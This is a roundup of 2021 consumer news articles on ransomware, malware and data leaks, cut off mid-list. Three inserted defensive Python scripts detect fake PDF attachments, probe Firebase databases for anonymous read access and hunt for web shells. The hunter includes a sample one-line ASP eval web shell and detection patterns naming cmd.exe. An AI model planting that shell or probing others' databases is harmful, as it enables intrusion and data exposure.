“The recent wave of escalating cyber and ransomware attacks on organizations will and is resulting in significant impact to the consumer. Most of what is being discussed and being written about is the operational impact to the organization. What is less understood and discussed is the impact to consumers and individuals,” Das told ConsumerAffairs.

“Whether it is the Solarwinds attack or the more recent attacks on the energy pipeline and now the meat processing industry, they will and are resulting in significant impact to the consumer.” How? Das says that even in the short term of those cyberattacks, consumers faced gas shortages and price increases. 

“These are indicative of the disruption that these attacks could cause. Also of concern is the possibility of data theft in any or all of these attacks. While it is not clear, at the moment, if any data has been stolen, stolen information would increase the possibility of consumers facing increasing identity-related crimes as well as their personal information being held hostage,” he said.


Cyberattack sidelines the world’s largest meat producer

JBS, the world’s largest meat processor, was the target of a cyberattack over the weekend that shut down its North American and Australian operations.

The company said it was forced to shut down some of its computer networks after an organized assault by an unidentified hacker group. Officials say the attack could result in some delays in its transactions with customers.

“The company took immediate action, suspending all affected systems, notifying authorities, and activating the company's global network of IT professionals and third-party experts to resolve the situation,” JBS said in a statement. “The company’s backup servers were not affected, and it is actively working with an Incident Response firm to restore its systems as soon as possible.”

The attack is the second on a major industry in less than a month. In May, a Russia-based hacker group shut down the Colonial pipeline carrying gasoline from the Gulf Coast to the Southeast and Mid-Atlantic states, resulting in fuel shortages and higher prices.

The latest attack could affect consumers at the supermarket. Because of JBS’s global scale, industry analysts say a shutdown that extends longer than a week could have an impact on the global supply chain. Plants in Canada and Australia ship meat around the world, including to U.S. wholesalers.

Previous supply chain issues

The industry has only recently recovered from severe supply chain issues that arose during the coronavirus (COVID-19) pandemic. Outbreaks of the virus forced some U.S. meat processing plants to close temporarily. There was also a shortage of truck drivers to deliver the products to stores.

According to Bloomberg, the attack caused plants to cancel two shifts and stop processing operations at one of its Canadian plants. The report cites a union statement that operations have been affected at some U.S. facilities.

Two weeks ago, Microsoft issued a warning that cyber attacks were increasing and were becoming more dangerous. The company said the latest threat is malware that is delivered by email in the form of a PDF attachment.


U.S. pipeline companies must now report cyberattacks to the government

The Biden administration has announced that it will require the nation’s leading pipeline companies to disclose any significant cyberattacks to the government. 

Companies aren’t currently required to report cyberattacks, meaning experts don’t have a clear picture of how vulnerable the industry is to hackers. Earlier this month, the repercussions of a cyberattack on a pipeline were on full display after the Colonial Pipeline was hit by one. The incident led to panic and fuel shortages across nearly half of the East Coast. 

Alejandro N. Mayorkas, the secretary of homeland security, said Thursday morning that the Colonial Pipeline case showed “that the cybersecurity of pipeline systems is critical to our homeland security.” 

"Ransomware, which is primarily criminal and profit-driven, can rise to the level of posing a national security risk and disrupt national critical functions," he said. 

New security directive

In addition to requiring major pipeline companies to report cyberattacks, the Biden administration’s new directive calls for the creation of 24-hour emergency centers focused on heading off these threats if they do occur. 

A cybersecurity coordinator will be designated to coordinate with both the Transportation Security Administration (TSA) -- which was tasked with controlling pipeline security post-September 11, 2001 -- and the Cybersecurity and Infrastructure Security Agency (CISA) in the event of a cyber attack. The New York Times noted that it’s unclear “what that employee would be empowered to do other than raise an alarm.” 

The order also requires pipeline companies to “identify any gaps and related remediation measures to address cyber-related risks” and report them to the TSA and CISA within the next 30 days. 

Homeland Security officials added that they will “continue to work closely with our private-sector partners to support their operations and increase the resilience of our nation’s critical infrastructure.”

Microsoft warns users about new malware threat that mines personal information

Microsoft is alerting users about a huge malware campaign that can steal data and stage fake ransomware attacks.

The malware tries to lure recipients into opening what appear to be PDF attachments in email blasts. But when victims click on those attachments, they wind up downloading a malware variant called StrRAT.

Microsoft’s Security Intelligence Team tweeted that StrRAT can steal browser passwords, log keystrokes, and run remote commands on an infected machine. 

Remote command execution is the most dangerous of those capabilities. It lets the attacker run whatever they like on the victim’s computer and harvest sensitive information ranging from email credentials to data stored in web browsers.

The attack sequence to watch out for

In following the malware’s trails, Threatpost was able to determine what the malware’s attack sequence is. It plays out like this:

To start, attackers have been known to use compromised email accounts to send several different emails. To date, the messages disguise the sender as a supplier or as someone involved in the payment of goods or services. Some of the messages use the subject line “Outgoing Payments.” Others refer to specific payments supposedly made by the “Accounts Payable Department.” Still others say “your payment has been released as per attached payment advice” and ask the recipient to verify adjustments made in the attached PDF.

That PDF -- if clicked -- is where the trouble starts. The malware is downloaded to the user’s computer and the hackers are off to the races gathering all the data they can mine. While extortion is not the primary idea behind the attack, reports are circulating that the hackers may also try to make a quick buck off users by disguising their attack as a form of ransomware.
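The lure depends on an attachment that looks like a PDF but is not one. The script below, an added example and not code from Microsoft or Threatpost, parses a raw email, finds every attachment that claims to be a PDF (by filename or declared content type), and checks the first bytes of the payload against the PDF signature. The sample message, the sender and recipient addresses, and the fake attachment are all constructed here; the file types in the sniffing table are an assumption about what a practitioner would want to distinguish, not a description of StrRAT’s payload.

```python
import email
from email import policy
from email.message import EmailMessage

# Leading bytes of the formats we tell apart (constructed table: a real PDF and
# the ZIP container used by archives and Java JAR files).
PDF_MAGIC = b"%PDF-"
ZIP_MAGIC = b"PK\x03\x04"


def sniff(data):
    """Identify an attachment by its magic bytes rather than by its name."""
    if data.startswith(PDF_MAGIC):
        return "pdf"
    if data.startswith(ZIP_MAGIC):
        return "zip"
    return "other"


def suspicious_attachments(raw_message):
    """Return (filename, declared content type, sniffed type) for every attachment
    that is presented as a PDF but whose bytes are not a PDF."""
    msg = email.message_from_bytes(raw_message, policy=policy.default)
    findings = []
    for part in msg.iter_attachments():
        name = part.get_filename() or ""
        declared = part.get_content_type()
        payload = part.get_payload(decode=True) or b""
        claims_pdf = name.lower().endswith(".pdf") or declared == "application/pdf"
        real = sniff(payload)
        if claims_pdf and real != "pdf":
            findings.append((name, declared, real))
    return findings


def build_sample():
    """Constructed lure in the style of the 'Outgoing Payments' emails: the
    'payment advice PDF' actually starts with a ZIP header."""
    msg = EmailMessage()
    msg["From"] = "accounts@supplier.example"      # constructed address
    msg["To"] = "you@company.example"              # constructed address
    msg["Subject"] = "Outgoing Payments"
    msg.set_content("Your payment has been released as per attached payment advice.")
    fake_pdf = ZIP_MAGIC + b"\x14\x00" + b"\x00" * 40   # header only, not a valid archive
    msg.add_attachment(fake_pdf, maintype="application", subtype="pdf",
                       filename="Payment_Advice.pdf")
    return bytes(msg)


if __name__ == "__main__":
    for name, declared, real in suspicious_attachments(build_sample()):
        print(f"{name}: declared {declared}, actually {real}")
```

The same check is cheap to run at a mail gateway, where a declared-type/magic-byte mismatch is a far stronger signal than the subject line, which the attackers change freely.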

Guarding against the attack

Microsoft says its Microsoft 365 Defender delivers “coordinated defense against this threat” and can protect users against malicious emails after they’re detected.

The company’s Security Intelligence Team has also published what it knows on GitHub so others who deal with computer security can identify indicators of malicious behaviors related to StrRAT before they do any damage.

Microsoft to drop support for Internet Explorer next summer

Microsoft has announced that it will officially end support for its Internet Explorer browser next June. The company is encouraging users to switch to its newer browser, Microsoft Edge. 

In a blog post on Wednesday, Microsoft highlighted the myriad benefits of transitioning to Microsoft Edge. Those benefits include enhanced security, speed, and compatibility with a greater range of websites. 

"The future of Internet Explorer on Windows 10 is in Microsoft Edge," the company said. "Not only is Microsoft Edge a faster, more secure and more modern browsing experience than Internet Explorer, but it is also able to address a key concern: compatibility for older, legacy websites and applications."

The tech giant noted that Microsoft Edge has Internet Explorer mode (“IE mode”) built in, so users will still be able to access Explorer-based websites and apps from the newer browser. That said, Microsoft said it’s officially pulling the browser out of service next summer. 

“With Microsoft Edge capable of assuming this responsibility and more, the Internet Explorer 11 desktop application will be retired and go out of support on June 15, 2022, for certain versions of Windows 10,” the company wrote. 

Upgrading is easy

Microsoft has been moving closer to making this announcement for some time. Last year, Microsoft said its Microsoft 365 apps suite would no longer support Internet Explorer 11 as of August 17, 2021. The company touted the various benefits of switching to Edge and said users would “get the most out of Microsoft 365” by switching to its newer browser. 

The company said it’s committed to helping make the transition to Edge “as smooth as possible.” In its Wednesday blog post, Microsoft said users will find that it’s easy to move all of their passwords and data over to the new browser.  

“We’ve also aimed to make the upgrade to Microsoft Edge simple. Once you’ve opted in to moving to Microsoft Edge, it’s easy to bring over your passwords, favorites and other browsing data from Internet Explorer in a few clicks,” the company said. “And if you run into a site that needs Internet Explorer to open, Microsoft Edge has Internet Explorer mode built-in so you can still access it.”

Android app ‘misconfigurations’ left over 100 million users vulnerable to cyberattacks

Researchers from cybersecurity firm Check Point Research have found that a number of Android apps had “misconfigurations” on cloud services, leaving data belonging to more than 100 million users vulnerable to a variety of attacks. 

In a report published Thursday, Check Point said it recently discovered that the developers behind nearly two dozen mobile apps didn’t configure their real-time database properly. 

“Real-time database allows application developers to store data on the cloud, making sure it is synched in real-time to every connected client,” Check Point explained. 

In the last few months, the team said many application developers have “put their data and users’ data at risk” by failing to ensure that authentication mechanisms were in place.

“By not following best practices when configuring and integrating 3rd party cloud services into applications, millions of users’ private data was exposed,” the team wrote. “In some cases, this type of misuse only affects the users, however, the developers were also left vulnerable. The misconfiguration put users’ personal data and developer’s internal resources, such as access to update mechanisms and storage at risk.” 
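The misconfiguration Check Point describes is testable without any credentials. The script below is an added example, not code from Check Point’s report: it pulls database URLs out of a strings dump of an app package and asks each database for its top-level keys as an anonymous client. It assumes the “real-time database” in question is Firebase Realtime Database, whose REST endpoint answers an anonymous read with HTTP 200 when the rules allow it and with 401 “Permission denied” when they do not; the strings dump and the HTTP responses used below are constructed.

```python
import re
import urllib.error
import urllib.request

# Hostnames used by Firebase Realtime Database instances (assumption: the apps
# used Firebase; the article only says "real-time database").
DB_URL_RE = re.compile(
    r"https://[a-z0-9-]+\.(?:firebaseio\.com|[a-z0-9-]+\.firebasedatabase\.app)"
)


def extract_db_urls(strings_dump):
    """Collect distinct database URLs from a strings dump of an APK
    (for example the output of `strings classes.dex`)."""
    return sorted(set(DB_URL_RE.findall(strings_dump)))


def http_get(url):
    """Unauthenticated GET returning (status, body); 4xx is a result, not an exception."""
    try:
        with urllib.request.urlopen(url, timeout=10) as resp:
            return resp.status, resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as err:
        return err.code, err.read().decode("utf-8", "replace")


def classify(db_url, fetch=http_get):
    """'open' if the root can be read anonymously, 'locked' if the rules refuse,
    'unknown' otherwise. shallow=true asks only for top-level keys, so the check
    does not pull a large database across the wire."""
    status, _body = fetch(db_url.rstrip("/") + "/.json?shallow=true")
    if status == 200:
        return "open"
    if status in (401, 403):
        return "locked"
    return "unknown"


def audit(strings_dump, fetch=http_get):
    """Map every database URL found in the dump to its classification."""
    return {url: classify(url, fetch) for url in extract_db_urls(strings_dump)}


# Constructed strings dump: two database URLs buried among ordinary app strings.
SAMPLE_DUMP = """
com.example.taxi
https://taxi-app-1a2b3.firebaseio.com
res/layout/activity_main.xml
https://taxi-app-1a2b3-default-rtdb.europe-west1.firebasedatabase.app
"""

if __name__ == "__main__":
    for url, verdict in audit(SAMPLE_DUMP).items():
        print(f"{verdict:8} {url}")
```

A database that comes back "open" here is exactly the condition the researchers exploited: anyone who extracts the URL from the app can read what the app reads. The fix is on the server side, in the database rules, not in the client.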

23 apps examined

The researchers said the 23 Android apps they examined -- which included a taxi app with over 50,000 installs, a logo maker, a screen recorder with over 10 million downloads, a fax service, and astrology software, among others -- contained a variety of security shortcomings. 

Check Point said the apps were leaking data that included email records, chat messages, location information, user IDs, passwords, and images. Thirteen of the apps left sensitive data publicly available in unsecured cloud setups. 

In the case of the Angolan taxi app “T’Leva,” the researchers found that they were able to obtain user data, including messages exchanged with drivers, riders’ full names, phone numbers, and destination and pickup locations.  

‘Disturbing reality’

Aviran Hazum, Check Point's manager of mobile research, said the study "sheds light on a disturbing reality where application developers place not only their data, but their private users' data at risk."

When app developers fail to follow the “best practices” when configuring and integrating third party cloud services, the researchers said it could potentially leave users vulnerable to several types of cybersecurity threats. 

"This misconfiguration of real-time databases is not new, but [..] the scope of the issue is still far too broad and affects millions of users," the researchers said. "If a malicious actor gains access to this data it could potentially result in service-swipe (trying to use the same username-password combination on other services), fraud, and identity theft."

The firm said it informed the app developers of the vulnerabilities, and a few have since changed their configuration.

Cybercriminal group behind Colonial Pipeline attack bags $90 million from victims

DarkSide, the hacker group behind the temporary shutdown of the Colonial Pipeline, received just over $90 million in bitcoin ransom payments from victims, according to new research. 

Earlier this month, the Colonial Pipeline -- a 5,500-mile pipeline that supplies fuel to the East Coast of the U.S. -- was hit by a cyberattack, causing a system outage. The attack led to a shortage in fuel supplies, which led to crowds at gas stations and higher gas prices.

In a blog post, London-based blockchain analytics firm Elliptic said it identified the Bitcoin wallet used by the cybercriminals to collect ransom payments from victims. 

“In total, just over $90 million in Bitcoin ransom payments were made to DarkSide, originating from 47 distinct wallets,” Elliptic said. “According to DarkTracer, 99 organisations have been infected with the DarkSide malware - suggesting that approximately 47% of victims paid a ransom, and that the average payment was $1.9 million.” 

Colonial reportedly paid the Eastern European criminal gang $5 million. 

‘Ransomware as a service’ business model

Last Monday, DarkSide issued a statement saying it didn’t intend to cause a disruption in the movement of fuel supplies. It operates a “ransomware as a service” business, meaning it developed the software used by the criminals that carried out the attack.

“We are apolitical, we do not participate in geopolitics,” the group said in the statement.

Nonetheless, security researchers said DarkSide and its affiliates netted at least $90 million in bitcoin ransom payments over the past nine months. The funds were extracted from 47 victims. 

Elliptic said the average payment from organizations was around $1.9 million. Of the $90 million total figure, $15.5 million went to DarkSide’s developer and $74.7 million went to its affiliates. A majority of the funds are being sent to crypto exchanges where they can be swapped for other cryptocurrency assets or fiat money. 

“To our knowledge, this analysis includes all payments made to DarkSide, however further transactions may yet be uncovered, and the figures here should be considered a lower bound,” said Tom Robinson, Elliptic’s co-founder and chief scientist.

White House signs new cybersecurity order to protect U.S. networks and consumers

President Biden has signed a new executive order that he hopes will improve cybersecurity for Americans and protect federal government networks from attacks like the recent Colonial Pipeline incident. 

Biden said malicious cyber activities -- like network hacks, phishing, and data thefts -- have gone too far and that the U.S. cyber defense systems are insufficient, making both the public and private sectors more vulnerable to incidents. 

“These incidents share a few things in common. First, a laissez-faire attitude towards cybersecurity,” commented a senior White House official in announcing the order. “For too long, we failed to take the necessary steps to modernize our cybersecurity defenses because doing so takes time, effort, and money. And instead, we’ve accepted that we’ll move from one incident response to the next. And we simply cannot let ‘waiting for the next incident to happen’ to be the status quo under which we operate.”

Starting at the top 

The Colonial Pipeline incident wasn’t pegged as the breaking point that created the new order. It -- along with the SolarWinds and Microsoft Exchange incidents -- proved that U.S. cybersecurity was in a world of hurt. To prevent skirmishes like that in the future, the White House’s goals will start at the top of the digital food chain with the intent of creating a “zero-trust environment.” 

Internet service providers, network security systems, and other top-level segments are being asked to deploy measures like multi-factor authentication, encryption, endpoint detection and response, and logging to keep bad actors at bay. They’re also being asked to share information about attacks with their peers so an all-for-one, one-for-all community can be nurtured. The second layer of the Biden administration’s plan deals with improving the security of commercial software by establishing baseline security requirements based on industry best practices. 

“We wouldn’t build a building in an earthquake-prone zone without building standards,” the White House official said. “And we need standards for how we build software securely.”

Tighter controls on software development

To that end, the U.S. is kickstarting a pilot program to create an “energy star” type of label so the government – and the public at large – can quickly determine whether software was developed securely. 

“Too much of our software, including critical software, is shipped with significant vulnerabilities that our adversaries exploit. This is a long-standing, well-known problem, but for too long we have kicked the can down the road,” the White House said in a statement.

However, the official warned that this move alone isn’t the answer. “This will be the first of many ambitious steps the public and private sector must and will take together to safeguard our economy, security, and the services on which the American way of life relies,” they said.

Cyberattack shuts down major gasoline pipeline

Gas prices could move higher, at least temporarily, after a major pipeline supplying fuel to the East Coast of the U.S. was closed over the weekend due to a cyberattack.

The Colonial Pipeline, which stretches from the Gulf Coast to New Jersey and moves millions of gallons of fuel, had to be shut down when hackers launched a ransomware attack against the company that operates it. 

The company said it has not yet been able to uncover any evidence that the attackers were able to penetrate the pipeline’s vital systems. The company shut down the pipeline out of an abundance of caution.

“In response, we proactively took certain systems offline to contain the threat, which has temporarily halted all pipeline operations and affected some of our IT systems,” Colonial said in a statement. 

FBI investigating

The company said it acted immediately to engage a cybersecurity firm to investigate. At the same time, it notified the FBI. A spokesman for the agency told the Wall Street Journal that the agency is working closely with Colonial to make sure its systems remain secure from attack.

“Colonial Pipeline is taking steps to understand and resolve this issue,” the company said. “At this time, our primary focus is the safe and efficient restoration of our service and our efforts to return to normal operation. This process is already underway, and we are working diligently to address this matter and to minimize disruption to our customers and those who rely on Colonial Pipeline.”

But closing the 5,500-mile-long pipeline has cut off a major artery of fuel across the Southeast and up the Atlantic Coast. Depending on how long the shutdown continues, fuel supplies could begin running low and prices could begin to rise. 

Advice for consumers

Patrick DeHaan, head of petroleum analysis at GasBuddy, advised motorists served by the pipeline on Sunday not to panic.

“Rushing out and filling your tank will make the problem much much more acute and likely double or triple the length of any supply event if it comes to that,” he tweeted.

The Colonial Pipeline moves 100 million gallons of gasoline, diesel fuel, and other products each day, so a lengthy shutdown would be noticeable at the gas pump in a highly populated area of the country. The company noted that it moves nearly half the region’s fuel on a daily basis.

In 2017, Hurricane Harvey forced a shutdown of the Colonial Pipeline, resulting in a temporary price surge at the gas pump. Months earlier, Colonial suffered a break in its Line 1 in Georgia, interrupting fuel supplies to the East Coast. It resulted not only in rising prices but caused lines at gas stations in Tennessee when some stations' tanks ran dry. It took several weeks for prices to return to normal.

Hundreds of millions of Dell computers found to have ‘severe’ system flaws that compromise security

Security researchers have discovered that a driver Dell has been shipping with its firmware update utilities for the last 12 years contains “five high severity flaws.” Experts at SentinelLABS say those flaws impact hundreds of millions of Dell desktops, laptops, notebooks, and tablets.

Although the vulnerabilities could allow hackers to exploit Dell computers and do further damage, SentinelLABS says it has not discovered evidence of any “in-the-wild abuse.” 

As for owners of non-Dell computers, there’s good news: this specific vulnerability affects only Dell-specific systems.

Dell steps up to fix the issue

Even though SentinelLABS hasn’t uncovered any widespread abuse, Dell isn’t taking any chances. Just to make sure nothing goes wrong, the company has sent a security update to its customers to address the exposure. It recommends that every Dell computer owner apply the patch as soon as possible.

Dell warns owners that a hacker could use phishing techniques to gain access to their computer if it is left unpatched. “To help protect yourself from malicious actors, never agree to give remote control to your computer to any unsolicited contact (such as from an email or phone call) to fix an issue,” the company advises.

SentinelLABS also says customers should not delay installing the patch. “It is inevitable that attackers will seek out those that do not take the appropriate action. Our reason for publishing this research is to not only help our customers but also the community to understand the risk and to take action,” said SentinelLABS’ Kasif Dekel.

Verizon sells off Yahoo and AOL to focus on its wireless business

Verizon is bidding farewell to its media group, home to digital brands AOL and Yahoo. The company is selling the unit to a private equity firm.

In a $5 billion deal, Apollo Global Management will be the new parent company of Verizon Media -- a deal that comes preloaded with 900 million monthly active users worldwide. Among the more well-known consumer-side companies Apollo has an investment in are the home security service ADT, movie rental company Redbox, photo service company Shutterfly, and online education provider University of Phoenix.

Verizon Media has been a heavy burden for the company, taking four years for it to show year-over-year growth since the wireless titan acquired Yahoo for $4.48 billion. The company is not getting out of the digital media business altogether, rather just shifting gears with an emphasis on its internet-provider businesses. As part of the deal, Verizon is holding on to a 10% ownership stake just in case there’s a seismic shift back to digital media down the line.

Value in Yahoo’s name

Yahoo -- the once golden child of internet search -- has been left to pick up breadcrumbs left by Google for the last decade. However, out of the three major search engines -- Google, Bing, and Yahoo -- only Google and Yahoo were turning a profit as of mid-2020. 

Apollo was happy to take Yahoo off Verizon’s hands, especially for the advertising revenue it brings. When the COVID-19 pandemic forced people indoors and online, Yahoo experienced quite a leap in shopping and services. Yahoo Mail-based commerce grew to seven times its 2019 level and the company’s overall revenue jumped 187%, led by triple-digit growth at Yahoo Finance Premium and Extra Crunch Premium, its weekly event series connecting company founders with tech leaders. 

The Yahoo News niche is also of particular value to Apollo as it continues to evolve -- especially with Generation Z. Recently, it claimed the slot of the fastest growing news organization on TikTok. 

“We are big believers in the growth prospects of Yahoo and the macro tailwinds driving growth in digital media, advertising technology and consumer internet platforms,” said David Sambur, Senior Partner and Co-Head of Private Equity at Apollo. “Apollo has a long track record of investing in technology and media companies and we look forward to drawing on that experience to help Yahoo continue to thrive.” 

New Flubot malware is infecting phones and stealing data across the globe

A new strain of password-stealing Android malware is infecting consumers’ devices around the world. Mobile network operators and security researchers worldwide have sent up a flare about a text message scam infecting users with Flubot, a malicious piece of spyware. 

Flubot is able to spy on consumers and access contact details once it infiltrates a user’s phone system. It can even go on a text message spree that will send out more malicious messages to further spread the spyware.

How Flubot works

The way Flubot appears on a user’s phone is pretty innocuous -- a text message simply pops up claiming to be from a delivery company. Within that message, users are prompted to click on a link to track their supposed package. The link leads to a page that prompts the user to install an app, and that app is the spyware itself.

Britain’s National Cyber Security Centre reports that the malicious messages have claimed to be from DHL so far, but researchers warn that other delivery companies can easily be cited for the purposes of the scheme. The organization also reports that Apple device users are not currently at risk of infection, but the scam text messages might still redirect them to a website that tries to steal their personal information.

Protecting yourself against Flubot

Dealing with malware is a hassle that nobody wants, so it’s important that everyone is aware of what to look out for when it comes to these scams. If you receive a text message from a company that you don’t normally do business with or someone you don’t frequently get text messages from, that should immediately raise red flags.  

If you receive one of these suspicious messages, this is what you should do:

  1. Do not click the link in the message, and do not install any apps if prompted.

  2. Forward the message to 7726 (SPAM), a free spam reporting service endorsed by the Federal Trade Commission (FTC) and offered by telephone companies.

  3. Delete the message.

  4. In situations in which you were actually expecting a DHL delivery, it’s recommended that you visit the official DHL website to track your delivery. Make sure that you do not use the link in the scam text message.

All is not lost if you have already clicked the link to download the application, but you are going to have to do a system reset and wipe your device clean. One important thing: Do not enter your phone’s password or log into any accounts until you have done all the steps.

  1. Perform a factory reset. The process for a reset on an Apple device is here; for Android devices, follow the steps posted here. Sadly, you will lose the data on your phone if you don’t have a backup of your device.

  2. Once you set up the device after the reset, you might be asked if you want to restore it from a backup. Make sure you do not restore from a backup made after you installed the malicious app, because that backup will contain the malware too.

Two final suggestions: take preventive measures if you haven’t been hit by Flubot. Back up your device and only install apps from your device’s “official” app store like Apple’s App Store and Google’s Play Store. An additional suggestion for Android users is to make sure Google’s Play Protect is enabled on your device. Every additional layer of protection is worth the effort when fighting against malware and spyware.

You should also investigate steps the FTC suggests as possible ways to protect your phone from malware and spyware. Those suggestions are available here.

Geico customers’ driver’s license numbers were exposed in data breach

Geico suffered a data breach earlier this year that led to customers’ driver’s license numbers being exposed for more than a month. 

In a data breach notice, the motor vehicle insurer said it fixed the security issue immediately after becoming aware of it. However, there’s still some risk that fraudsters could apply for unemployment benefits using the stolen data.

“We recently determined that between January 21, 2021 and March 1, 2021, fraudsters used information about you – which they acquired elsewhere – to obtain unauthorized access to your driver’s license number through the online sales system on our website,” the company wrote in the breach notice. “We have reason to believe that this information could be used to fraudulently apply for unemployment benefits in your name.”

Security enhancements 

Geico said the hackers behind the breach used personal information about Geico customers that they pilfered from other places in order to gain access to Geico’s sales system and steal the driver’s license numbers. 

“As soon as GEICO became aware of the issue, we secured the affected website and worked to identify the root cause of the incident. While we regularly maintain high security and privacy standards, we have also implemented—and continue to implement—additional security enhancements to help prevent future fraud and illegal activities on our website,” the notice said.

The company said it isn’t sure how many customers were affected by the breach or if the scope of the incident extends beyond California. Customers with security concerns can get a one-year subscription to IdentityForce -- an identity-theft protection service. The insurance company is also encouraging its customers to vigilantly look at account statements and credit reports to ensure that there is no unauthorized activity. 

“If you receive any mailings from your state’s unemployment agency/department, please review them carefully and contact that agency/department if there is any chance fraud is being committed,” Sheila King, a manager for data privacy at Geico, wrote in the breach notice. 

FBI remotely hacks computers to remove Hafnium infections

In an effort to mitigate the threat of the Hafnium hack, the FBI has been cleared to use the hackers’ own tools to remotely delete infections on people’s computers. 

Last month, security researchers began sounding the alarm about a hack being carried out by a Chinese espionage group known as “Hafnium.” The hack involved the exploitation of multiple zero-day vulnerabilities, and it affected tens of thousands of Microsoft Exchange Servers around the world. 

While Microsoft did eventually address the issue in the form of detection tools and patches, the threat of the hack has lingered. Now, the Justice Department has disclosed that a Texas court granted the FBI approval to utilize a number of remaining backdoors to remotely delete Hafnium infections. 

“Today’s court-authorized removal of the malicious web shells demonstrates the Department’s commitment to disrupt hacking activity using all of our legal tools, not just prosecutions,” reads a statement from Assistant Attorney General John C. Demers, with the Justice Department’s National Security Division.

Operation successful

The Department said the operation was successful, but further action will be required to fully patch the vulnerabilities. 

“The FBI conducted the removal by issuing a command through the web shell to the server, which was designed to cause the server to delete only the web shell (identified by its unique file path),” the U.S. Justice Department stated. 

Under the operation, experts “did not patch any Microsoft Exchange Server zero-day vulnerabilities or search for or remove any additional malware or hacking tools that hacking groups may have placed on victim networks by exploiting the web shells.” 

The Justice Department said it “strongly encourages network defenders to review Microsoft’s remediation guidance and the March 10 Joint Advisory for further guidance on detection and patching.” 
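Because the operation removed only the web shells it knew about, defenders still have to check their own servers for anything the attackers left behind. The script below is an added example, not code from the FBI, Microsoft, or the joint advisory: it walks a web root, picks out ASP.NET script files changed since a cutoff date, and flags those containing constructs that turn a page into a remote command runner. The pattern list is a generic triage heuristic, not the indicator set from any advisory, and the directory tree and file names it runs against are constructed here.

```python
import re
import tempfile
from datetime import datetime, timezone
from pathlib import Path

# Generic constructs that make an ASP.NET page execute attacker-supplied input.
# Heuristics for triage, not indicators from any particular advisory.
SHELL_PATTERNS = {
    "eval-of-request": re.compile(rb"eval\s*\(\s*Request", re.I),
    "request-item":    re.compile(rb"Request\.Item\s*\[", re.I),
    "process-start":   re.compile(rb"Process\.Start\s*\(", re.I),
    "assembly-load":   re.compile(rb"Assembly\.Load\s*\(", re.I),
    "cmd-exe":         re.compile(rb"cmd\.exe", re.I),
}
SCRIPT_SUFFIXES = {".aspx", ".ashx", ".asmx"}


def hunt_webshells(root, since):
    """Return sorted (path, [matched pattern names]) for script files under root
    modified at or after `since` that contain any of the constructs above.
    Modification time is a weak filter on its own, since an attacker can reset it;
    run once more with `since` far in the past to cover timestomped files."""
    hits = []
    for path in Path(root).rglob("*"):
        if not path.is_file() or path.suffix.lower() not in SCRIPT_SUFFIXES:
            continue
        mtime = datetime.fromtimestamp(path.stat().st_mtime, tz=timezone.utc)
        if mtime < since:
            continue
        data = path.read_bytes()
        matched = [name for name, pat in SHELL_PATTERNS.items() if pat.search(data)]
        if matched:
            hits.append((str(path), matched))
    return sorted(hits)


def build_sample_tree():
    """Constructed web root: one benign page and one page with a one-line command runner."""
    root = Path(tempfile.mkdtemp())
    (root / "pages").mkdir()
    (root / "pages" / "index.aspx").write_bytes(
        b'<%@ Page Language="C#" %>\r\n<html><body>Sign in</body></html>\r\n')
    (root / "pages" / "help.aspx").write_bytes(
        b'<%@ Page Language="Jscript" %>'
        b'<%eval(Request.Item["cmd"],"unsafe");%>\r\n')
    return root


def demo(cutoff_year=2021):
    """Run the hunt over the constructed tree with a cutoff of 1 March of the given year."""
    since = datetime(cutoff_year, 3, 1, tzinfo=timezone.utc)
    return hunt_webshells(build_sample_tree(), since)


if __name__ == "__main__":
    for path, matched in demo():
        print(path, ",".join(matched))
```

Anything this flags should be preserved for forensics before it is deleted, since the file path and content are what tie a shell back to the initial exploitation.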

LinkedIn data leak compromises 500 million user accounts

It seems like only yesterday that 533 million Facebook accounts were compromised by malicious actors. But the hacking world never sleeps, and personal information from hundreds of millions of LinkedIn accounts is now reportedly being offered on an online forum.

Cyber News reports that an archive of 500 million LinkedIn profiles was posted to a hacking forum, with the cyber thieves disclosing details of 2 million accounts to prove they have the goods. The leaked details were supposedly scraped from the site and include users’ full names, email addresses, phone numbers, workplace information, and other data.

For its part, LinkedIn says this incident was not technically a “LinkedIn data breach” because the information was “actually an aggregation of data from a number of websites and companies.” This likely means that the data collected by the hacker was information that was already viewable on the site. LinkedIn says it believes no private member account information was included.

How does this affect consumers?

There are a few different ways the information in this leak could be used for nefarious purposes. First, and perhaps most directly, any entity that buys the data from the hacking source could send spam messages to the email addresses and spam calls to the phone numbers. 

While this might be annoying enough on its own, the collected data could also be used for phishing attacks. These scam attempts would be especially dangerous because consumers’ personal information could be used to make them more believable. Cyber News notes that hackers could also combine the information they collected from this leak with information from other data breaches to compromise accounts. 

Consumers should consider implementing several standard cybersecurity practices to protect themselves and their online accounts. This includes resetting email and account passwords, reviewing what information they’re making available on social media and other websites, and enabling two-factor authentication on all online accounts. 

You can learn more about how to protect your online information by reading ConsumerAffairs’ guide on how to prevent identity theft.

Facebook leak exposes personal data on half a billion users

The personal data of 533,000,000 Facebook users worldwide, which went up for sale on the messaging app Telegram in January, has now spiraled out of control. 

Over the weekend, security researcher Alon Gal tweeted out that every single one of those half-billion Facebook records was just leaked for free. “This means that if you have a Facebook account, it is extremely likely the phone number used for the account was leaked,” Gal wrote.

Telephone numbers were just the top layer of what was stolen. Gal detailed that a person’s Facebook ID, full name, location, past location, birthdate, email address, account creation date, relationship status, and bio were also possibly purloined. Users from 106 countries are affected, including 32 million people in the U.S.

“Bad actors will certainly use the information for social engineering, scamming, hacking and marketing,” Gal said.

As of mid-morning on Monday, neither Facebook CEO Mark Zuckerberg, Facebook Security, nor Facebook’s Privacy blog had acknowledged the issue. 

Brace yourself for more

When ConsumerAffairs reached out for comment from Daniel Markuson, a digital privacy expert at NordVPN, he said that people should buckle up for a large wave of personalized phishing or social engineering attacks. In a hacker’s way of thinking, why not? There’s no monetary risk since the personal data was free. “It means that anyone with shady intentions was able to get their hands on it,” Markuson said.

“This leak raises huge concerns, especially now. Cybercriminals exploit fears or feed on the need for urgency. We have already seen a surge in pandemic-related cybercrimes, and this trend continues. Now, as countries all over the world are starting to roll out vaccination programs, there is another opportunity for cybercriminals.”

Markuson said that vaccine-related searches in the U.S. have grown by 1,900 percent since January. This shows that Americans are becoming increasingly anxious to get their COVID-19 vaccine and might be an easy target for hackers. 

Protecting yourself

Protecting yourself against a phishing email or malicious message isn’t complicated, but it does take some vigilance. When ConsumerAffairs asked Markuson what advice he would give to unsuspecting people, he gave us six things to watch out for.

  • Check the sender’s email address or telephone number. “Don’t just trust the display name – pay attention to the email address, telephone number, and other sender credentials,” he said.

